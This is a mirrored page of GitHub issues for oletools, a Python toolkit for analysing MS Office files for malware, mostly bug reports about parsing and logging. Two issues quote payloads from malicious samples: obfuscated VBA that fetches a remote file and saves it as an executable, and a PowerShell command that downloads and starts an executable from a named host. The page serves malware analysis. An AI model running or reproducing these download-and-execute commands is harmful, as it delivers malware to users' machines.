Code Monkey home page Code Monkey logo

decalage2 / oletools Goto Github PK

View Code? Open in Web Editor NEW
2.8K 100.0 561.0 5.21 MB

oletools - python tools to analyze MS OLE2 files (Structured Storage, Compound File Binary Format) and MS Office documents, for malware analysis, forensics and debugging.

Home Page: http://www.decalage.info/python/oletools

License: Other

Batchfile 0.29% HTML 9.59% Python 89.76% VBA 0.36%
python python-library olefile malware-analysis ms-office-documents compound rtf forensics ole-files security

oletools's People

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

oletools's Issues

olevba - malware using tricks in MHT files to disrupt base64 decoding

Originally reported by: Philippe Lagadec (Bitbucket: decalage, GitHub: decalage2)


Another sample, even more twisted than the previous ones referenced in issue #31:

https://malwr.com/analysis/ZDkzYzljZTJmZDViNDFjMzk5N2IwYThhODQyYjExYjg/

source: https://isc.sans.edu/diary/Obfuscated+MIME+Files/20643

Explanation: the malware sample contains an extra line at the end of the MIME headers, for the MIME part containing a MSO file encoded in base64, where VBA macros are stored. MS Office seems to ignore that header line, but Python's email package follows RFCs too strictly and considers the junk line as part of the data rather than headers. Therefore, the base64 decoding of the data fails, and olevba cannot decode the macros.

There is no simple workaround, this issue requires a modified version of the email package.


Use of Logger

Originally reported by: Anonymous


Hello:

When importing oletools.olevba while using a pre-defined logger for my application, I noted some anomalous behavior. It seemed that after invoking the VBA_Parser, any entry I was writing to my logfile in my application was also being written to STDERR as well.

To replicate this issue, I produced the following code.

#!python

#!/usr/bin/python

import sys
import logging
from oletools.olevba import VBA_Parser, VBA_Scanner
from cloghandler import ConcurrentRotatingFileHandler

# set up logger for application
dbg_h = logging.getLogger('dbg_log')
dbglog = '%s' % 'dbg.log'
dbg_rotateHandler = ConcurrentRotatingFileHandler(dbglog, "a")
dbg_h.addHandler(dbg_rotateHandler)
dbg_h.setLevel(logging.ERROR)

# read some document as a buffer
buff = sys.stdin.read()

# generate issue
dbg_h.error('Before call to module....')
vba = VBA_Parser('somedoc.doc', data=buff)
dbg_h.error('After call to module....')

When I run this, I get the following...

cat somedocument.doc | ./replicate.py
ERROR:dbg_log:After call to module....

My last dbg_h logger write attempt is getting output to the console as well as getting written to my dbg.log file. I see in your TODO you have a few comments surrounding logging. If it has not been considered already, I would like to suggest making that an option a caller can disable.


olevba - library update - IOC

Originally reported by: Anonymous


Sha from VT "33d4526dfba85f22397a7f21df4f4d0de445cf657ce8e2ddb44f95d24bf299ef"
Olevba script not picking up the URL in the code. They have also obfuscated parts for the MSXML2 object.

Open XPVB_FULLNAME For Output As #FileNumber1
Print #FileNumber1, "strRT = " + Chr(34) + "h" + Chr(Asc(Chr(Asc("t")))) + "t" + "p" + "://www.17u.cm/incs/update.rar" + Chr(34)
Print #FileNumber1, "strTecation = " + Chr(34) + "c:" + Chr(Asc("W")) + "indows" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34)

 Print #FileNumber1, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2" + "." + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(mttt - 4) + Chr(84) + Chr(80) + Chr(mttt - 54) + ")"
 'Print #FileNumber1, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." + Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")"

olevba.py failing to parse ChrW code

Originally reported by: Anonymous


If following VBA code is provided for analysis:

#!vba

test = ChrW(2016)

olevba.py fails with following message:

    vba_chr.setParseAction(lambda t: VbaExpressionString(chr(t[0])))
ValueError: chr() arg not in range(256)

It seems to work if line 596 of olevba.py is changed to the following:

#!python

vba_chr.setParseAction(lambda t: VbaExpressionString(unichr(t[0]).encode('utf-8')))

extracted VBA hex files from vbaproject.bin - how to extract VBA code?

Originally reported by: denfromufa (Bitbucket: denfromufa, GitHub: denfromufa)


vbaproject.bin is corrupted but some VBA modules are recoverable. So how to extract VBA code from these hex files?

C:\Python\Python27\Lib\site-packages\oletools>olevba.py stream1.bin
olevba 0.44 - http://decalage.info/python/oletools
Flags        Filename
-----------  -----------------------------------------------------------------
ERROR    stream1.bin is not a supported file type, cannot extract VBA Macros.
?            stream1.bin - File format not supported

(Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, TXT=Text, M=Macros, A=Auto-exec
utable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex
 strings, V=VBA strings, ?=Unknown)

===============================================================================
FILE: stream1.bin
Type: None
No VBA macros found.

Failure to decode embedded object

Originally reported by: bsod99 (Bitbucket: bsod99, GitHub: Unknown)


olevba is unable to decode the object contained in this dredex .doc.
Attached is the doc file that caused the error.

#!python
olevba 0.25 - http://decalage.info/python/oletools
Flags       Filename                                                         
----------- -----------------------------------------------------------------
!ERROR      ../../dredx.doc - Error -3 while decompressing data: unknown compression method

(Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)

===============================================================================
FILE: ../../dredx.doc
Traceback (most recent call last):
  File "olevba.py", line 1462, in process_file
    vba = VBA_Parser(filename, data)
  File "olevba.py", line 1262, in __init__
    ole_data = zlib.decompress(activemime[0x32:])
error: Error -3 while decompressing data: unknown compression method



Package Object Support

Originally reported by: Jeremy Humble (Bitbucket: jeremy_humble, GitHub: Unknown)


I've noticed an uptick lately in phishing campaigns sending out documents with embedded package objects (https://www.microsoft.com/resources/documentation/windows/xp/all/proddocs/en-us/packager_what_is_obj_pkg.mspx?mfr=true)

All of the attached files have executables embedded using this technique, but none of the oletools seem to be able to recognize or extract these types of objects.
I'm still researching this technique and will update this ticket if I find anything useful.

While running syria.pps through olefile, I did notice the following:

#!python

DEBUG    property id=13: type=4126 offset=108
DEBUG    property id=13: type=4126 not implemented in parser yet

DEBUG    property id=12: type=4108 offset=1D1
DEBUG    property id=12: type=4108 not implemented in parser yet

archive password is infected.


oletools 0.47 - issues with mraptor and olevba

oletools 0.47 has some issues:

1 - mraptor.py (0.04) gives me errors for tablestream and colorglass...so
I over-copied both folders with the folders from version 0.46 and it's
working.
=> moved to issue #57

2 - olevba.py --decode option is not extracting the content of an
UserForm. VBA FORM STRING is missing.
=> now moved to issue #60.

3 - when running mraptor:

local variable 'modulename_unicode_modulename_unicode'  referenced before assignment - triggered in olevba

4 - olevba:

ERROR    Unhandled exception in main: 'ProcessingError' object has no attribute 'orig_exception'
Traceback (most recent call last):
  File "/usr/local/bin/olevba", line 3292, in main
    print '%-12s %s - %s' % ('!ERROR', filename, exc.orig_exception)
AttributeError: 'ProcessingError' object has no attribute 'orig_exception'

olevba - Add support for MHT files with macros

Originally reported by: Philippe Lagadec (Bitbucket: decalage, GitHub: decalage2)


Greg (from SpamStopsHere) reported several recent malicious samples using the MHT format (MIME HTML), running VBA macros when opened in Word:

These MHT files can be created from Word, using the format "Single File Web Page - .mht (MHTML)". The resulting file is a MIME container, similar to an e-mail. It contains several files as attachements, including the Word document in XML format.

By default, MHT files are opened by Internet Explorer, which does not run macros. But if the file is renamed to ".doc", it will be opened in Word and macros can run as if it was a normal Word document.

If VBA macros are present, they are attached as a binary file named "editdata.mso", encoded in Base 64. This looks very similar to the Word 2003 XML format, already supported by olevba.

It should then be straightforward to add support for MHT files with VBA macros.


olevba - zipfile-related python errors in python 2.6

Originally reported by: chazomaticus (Bitbucket: chazomaticus, GitHub: chazomaticus)


It looks like the code in olevba.py:1371 relies on zipfile.is_zipfile handling file-like objects in addition to filenames. That functionality was added in python 2.7. As a result, this code:

from oletools.olevba import VBA_Parser
z = 'empty.zip'
print VBA_Parser(z, data=open(z, 'rb').read()).detect_vba_macros()

prints 'False' in python 2.7, but produces this error in python 2.6:

Traceback (most recent call last):
  File "test.py", line 4, in <module>
    print VBA_Parser(z, data=open(z, 'rb').read()).detect_vba_macros()
  File "/usr/lib/python2.6/site-packages/oletools/olevba.py", line 1371, in __init__
    elif zipfile.is_zipfile(_file):
  File "/usr/lib64/python2.6/zipfile.py", line 134, in is_zipfile
    fpin = open(filename, "rb")
TypeError: coercing to Unicode: need string or buffer, cStringIO.StringI found

Any non-OLE file will trigger the error in python 2.6; the empty.zip file in the example is attached for thoroughness.

It may be that when VBA_Parser is passed the data itself, zip detection/parsing simply won't work under python 2.6. I haven't looked too closely at the code around zipfile.is_zipfile there, but I suspect something could be done to at least prevent the exception from being thrown.


MSO Issues

Originally reported by: Anonymous


I was running 58024109295a9f48b52bec10f81570c9 through olevba today and noticed it seems to be missing some things. It dumps out the following:

#!text

VBA MACRO ThisDocument.cls
in file: None - OLE stream: u'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Private Sub Document_Open()
dsfsdff
End Sub

-------------------------------------------------------------------------------
VBA MACRO Module1.bas
in file: None - OLE stream: u'VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Sub dsfsdff()
ahvd = rddchgvjj.TextBox1
Shell ahvd, vbHide
End Sub

-------------------------------------------------------------------------------
VBA MACRO rddchgvjj.frm
in file: None - OLE stream: u'VBA/rddchgvjj'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
(empty macro)

It's pretty obviously running a shell command stored in rddchgvjj.TextBox1, but not all of rddchgvjj.frm is being dumped (I think) . If we dump out what olevba is seeing, we get this:

#!vba

Attribute VB_Name = "rddchgvjj"
Attribute VB_Base = "0{26E75ED9-CC6B-4519-8536-3769EE134A13}{073AADD7-1DDD-4AF3-97FA-10D8D7610A7F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

This doesn't tell us anything about TextBox1 though. I made a quick patch to olevba to out the entire extracted MSO contents and skimming through, I see the following:

#!text

[Workspace]^M
ThisDocument=50, 50, 878, 619, ^M
Module1=25, 25, 853, 594, ^M
rddchgvjj=125, 125, 953, 694, , 75, 75, 903, 644,

Shortly after, (along with a bunch of nulls and other binary data):

#!text

cmd /K PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://strawberry.reactionpointtimingindicator.com/zalupa/kurva.php','%TEMP%\sdjgbcjkds.exe');Start-Process '%TEMP%\sdjgbcjkds.exe'

Which is exactly what I wanted. I'm not sure if this is actually an object that is being missed or what exactly is going on here for certain. If this isn't actually an object being missed, but is something else, could there maybe be an option to dump the raw decompressed ActiveMime content? That way we can at least do some string searching on the output.

I can submit a pull request for that feature if that would help.

Thanks!


Handle junk at beginning of MIME MSO file

Originally reported by: Anonymous


For example, some new malicious doc files spammers sent out today had this at the beginning:

sssssssssss
MIME-Version: 2
Content-Type: multipart/related; boundary="----=_NextPart_E15iCSkeR03C.BZkNNxTU658"

Removing "sssssssssss" from the file allows olevba to parse it correctly.

Sample can be downloaded from here:

https://malwr.com/analysis/YWYyYzViMTkxNWNjNGYxZWFjZDI1ZjAxMjk2MWY5ZDg/


olevba - remove output to stderr

Originally reported by: Philippe Lagadec (Bitbucket: decalage, GitHub: decalage2)


olevba in oletools 0.12 takes more time to analyze files because it includes a VBA parser. Therefore I added a temporary message "analysis..." on the console. I did not want it to appear in the output if redirected to a file, so I wrote it to stderr.

In some cases such as running olevba from powershell, this causes issues because it can be considered as reporting an actual error.

solutions:

  • remove that message
  • write the message to stdout
  • add an option to disable that message.

Invalid CompressedChunkSignature in VBA compressed stream

Originally reported by: Anonymous


#!code

cuckoo@cuckoo-process:/tmp/decalage-oletools-d3c1e4fd0bb0/oletools$ python olevba.py bad.xls
olevba 0.42 - http://decalage.info/python/oletools
Flags        Filename
-----------  -----------------------------------------------------------------
!ERROR       bad.xls - Invalid CompressedChunkSignature in VBA compressed stream

(Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, TXT=Text, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)

===============================================================================
FILE: bad.xls
Type: OLE
No suspicious keyword or IOC found.

cuckoo@cuckoo-process:/tmp/decalage-oletools-d3c1e4fd0bb0/oletools$ md5sum bad.xls
d838f59f1c8769fbf4cff10f73255c0a  bad.xls

olefile doesn't handle corrupted? streams

Originally reported by: Anonymous


#!text

Traceback (most recent call last):
  File "/opt/cuckoo/lib/cuckoo/core/plugins.py", line 194, in process
    data = current.run()
  File "/opt/cuckoo/modules/processing/static.py", line 729, in run
    static = Office(self.file_path).run()
  File "/opt/cuckoo/modules/processing/static.py", line 706, in run
    results = self._parse(self.file_path)
  File "/opt/cuckoo/modules/processing/static.py", line 650, in _parse
    for (subfilename, stream_path, vba_filename, vba_code) in vba.extract_macros():
  File "/opt/cuckoo/lib/cuckoo/common/office/olevba.py", line 1611, in extract_macros
    for stream_path, vba_filename, vba_code in _extract_vba(self.ole_file, vba_root, project_path, dir_path):
  File "/opt/cuckoo/lib/cuckoo/common/office/olevba.py", line 631, in _extract_vba
    project = ole.openstream(project_path)
  File "/opt/cuckoo/lib/cuckoo/common/office/olefile.py", line 1922, in openstream
    return self._open(entry.isectStart, entry.size)
  File "/opt/cuckoo/lib/cuckoo/common/office/olefile.py", line 1816, in _open
    size_ministream, force_FAT=True)
  File "/opt/cuckoo/lib/cuckoo/common/office/olefile.py", line 1825, in _open
    filesize=self._filesize)
  File "/opt/cuckoo/lib/cuckoo/common/office/olefile.py", line 816, in __init__
    raise IOError('OLE stream size is less than declared')
IOError: OLE stream size is less than declared

Hash: fb4e7560fce968cc88f4931c6d44f095

Attached the sample, it's not defanged. Runs fine in Word 2010.


olevba macro extraction fails when module name = "text"

Originally reported by: Philippe Lagadec (Bitbucket: decalage, GitHub: decalage2)


Issue reported by @nks0ne in pull request #3:

extracting fails when and MODULENAME_ModuleName is "text".

#!text

Traceback (most recent call last):
None
  File "C:/Users/nks0ne/PycharmProjects/vbadump/main.py", line 56, in cloneRepo
    dumpVBA(filename,"./work/work3/vba_out",author,date_of_change)
  File "C:/Users/nks0ne/PycharmProjects/vbadump/main.py", line 69, in dumpVBA
    for (filename, stream_path, vba_filename, vba_code, meta) in vba.extract_macros():
  File "C:\Python27\lib\site-packages\oletools\olevba.py", line 1042, in extract_macros
    for results in ole_subfile.extract_macros():
  File "C:\Python27\lib\site-packages\oletools\olevba.py", line 1049, in extract_macros
    for stream_path, vba_filename, vba_code, meta in _extract_vba(self.ole_file, vba_root, project_path, dir_path, meta):
  File "C:\Python27\lib\site-packages\oletools\olevba.py", line 746, in _extract_vba
    filext = code_modules[MODULENAME_ModuleName]
KeyError: 'text'

Potential solution: use a default file extension when MODULENAME_ModuleName is not found in code_modules.


Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.